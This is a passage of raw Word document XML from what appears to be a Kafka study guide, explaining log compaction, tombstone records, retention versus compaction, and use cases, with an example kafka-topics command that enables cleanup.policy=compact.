          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2678F57D" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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tention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditional Kafka retention is time-based or size-based, where messages are retained for a certain amount of time or until the log reaches a certain size. After this, older messages are deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E7A9B" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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og Compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unlike retention, which deletes data based on time or size, log compaction keeps the most recent record for each key. Older records with the same key will eventually be deleted as newer records come in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6236A4" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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How It Works</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D72378" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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topics with log compaction enabled store a version of each message with a key. When a message with the same key is published later, Kafka compacts the log by keeping only the most recent record for that key, effectively discarding older records for the same key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00789009" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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periodically runs the compaction process in the background. The process is not immediate and does not happen with every message write. Instead, it compacts logs based on configured policies and intervals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3A49CA" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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lastRenderedPageBreak/>
        <w:t>If a message for a key is marked as "tombstone" (a message with a null value), it will delete all prior records with that key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532D9DC7" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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og Compaction Setup</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To enable log compaction, you need to set the cleanup.policy of a topic to compact. This is typically done when creating or altering a topic in Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180AC701" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00002E12">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Example of enabling log compaction on a topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70813C24" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00002E12">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topics.sh --alter --topic &lt;topic-name&gt; --partitions 3 --config cleanup.policy=compact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED158F" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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og Compaction vs. Deletion</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A60D8C1" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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In </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, Kafka ensures that only the most recent value for each key is kept, while older versions of the same key are discarded. This is particularly useful for use cases where it's necessary to retain the latest state of each entity (e.g., a user's profile or a device's configuration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60683ABB" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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In </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, data is deleted based on age or size limits, regardless of the key, meaning the entire log could be deleted even if the last version of a record is still relevant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A1F0E0" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Use Cases for Log Compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A28C27" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Event Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Useful in event-driven architectures where only the latest state of an entity (e.g., user, device) is important, and the system keeps updating that state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE798A6" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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aintaining State</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For applications where Kafka is used as a source of truth for storing the latest state of various entities. For example, a stock price system might keep only the most recent price for each stock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D7E21C" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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aching</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A cache system where stale cache values need to be cleaned up automatically and only the most recent value for each cache key is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A22CB" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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mpaction Process</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E57853" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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compaction happens asynchronously. It runs in the background, checking if a log segment is eligible for compaction based on whether it contains records with keys that have been replaced by newer messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6345D2EE" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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mpaction can occur at different times based on system load and configuration. Kafka compacts logs in segments, and once a segment has been compacted, only the latest value for each key remains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B9D8F2" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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mpaction in Action</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC45F47" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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magine you have the following messages for a key user1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74881CCD" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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user1 -&gt; {"name": "Alice", "age": 30}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5E7E6" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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user1 -&gt; {"name": "Alice", "age": 31}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575E2D1B" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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user1 -&gt; {"name": "Alice", "age": 32}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F55ABF" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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After compaction, only the latest record (with age 32) will remain, and older versions will be discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A7277B" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Tombstone Records</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA26836" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tombstone record</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a message with a null value that Kafka uses to mark a key as deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D84A0E1" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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f a message like user1 -&gt; null is sent, Kafka will compact the logs and remove all the previous records associated with user1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741CB997" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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is helps in cases where the entity (for example, a user or a product) is no longer required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08DE9A" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00002E12">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Benefits of Log Compaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28508074" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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pace Efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It prevents the accumulation of redundant records for the same key, reducing disk usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335CB90F" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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tate Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Useful for tracking only the latest state of an entity, like in event sourcing systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073442E7" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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duced Disk I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By keeping only the latest record for each key, Kafka reduces the amount of I/O operations needed to read through old records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF75235" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00002E12">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Example Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D19C797" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00002E12">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et's assume we have a Kafka topic user_updates that contains updates for user profiles. If we enable log compaction on this topic, each update to a user profile will be stored in Kafka. If there are several updates for the same user (say user1), Kafka will only keep the most recent update for user1, and older updates for user1 will be compacted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610AF44C" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00002E12">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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4AFEF7" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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nitially, user1 -&gt; {name: Alice, age: 25}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424577E" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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ater, user1 -&gt; {name: Alice, age: 26}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D7016" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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en, user1 -&gt; {name: Alice, age: 27}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D01EABD" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00002E12">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After compaction, only the user1 -&gt; {name: Alice, age: 27} record will remain in the log for that user, saving space and ensuring that consumers only read the latest profile data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9719F9" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00002E12">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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CC199B" w14:textId="77777777" w:rsidR="00002E12" w:rsidRPr="0003272F" w:rsidRDefault="00002E12" w:rsidP="00002E12">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lastRenderedPageBreak/>
        <w:t>Kafka’s log compaction feature helps ensure that only the most recent version of a record for a specific key is retained in Kafka, allowing for efficient storage of key-based state data while avoiding excessive disk usage. It is an ideal solution for scenarios such as tracking the current state of entities or storing key-value data where only the latest state is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1369CB0C" w14:textId="7B6F3DFF" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00002E12">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4B949BE">
          <v:rect id="_x0000_i3166" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9F504B" w14:textId="215FF4A9" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB1CF5" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="790" w:name="_Toc196308270"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain log compaction in Kafka, how it helps manage the log size, and the use cases for log compaction</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="790"/>
    </w:p>
    <w:p w14:paraId="02420C80" w14:textId="78A51FF0" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 Log Compaction: Overview and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE63942" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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afka Log Compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a feature that allows Kafka to retain only the most recent version of each record for a specific key, effectively reducing the size of the log by discarding older records that share the same key. This mechanism helps manage disk usage and ensures that only relevant data is retained, especially when dealing with state-based use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F70A4" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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ey Concepts of Log Compaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10010358" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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og Segments</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka topics are divided into partitions, and each partition consists of multiple log segments. Log compaction works at the level of these log segments, which are periodically cleaned and compacted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EA108D" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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mpaction vs. Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B89B2EF" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140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tention Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditional retention in Kafka is based on time or size, meaning records are deleted after a certain period or when a partition exceeds a certain size, regardless of their content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA26020" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140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og Compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Log compaction, on the other hand, retains only the latest record for each key. Older records with the same key are discarded, helping to reduce storage requirements without losing important data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4E9BA5" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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Tombstone Records</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5D19F" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140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In Kafka, a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tombstone record</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a special record with a null value used to mark a record as deleted. If a producer sends a message with a null value for a specific key, Kafka will compact the log by removing all records associated with that key, effectively deleting the entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6037A1F1" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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How Compaction Works</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
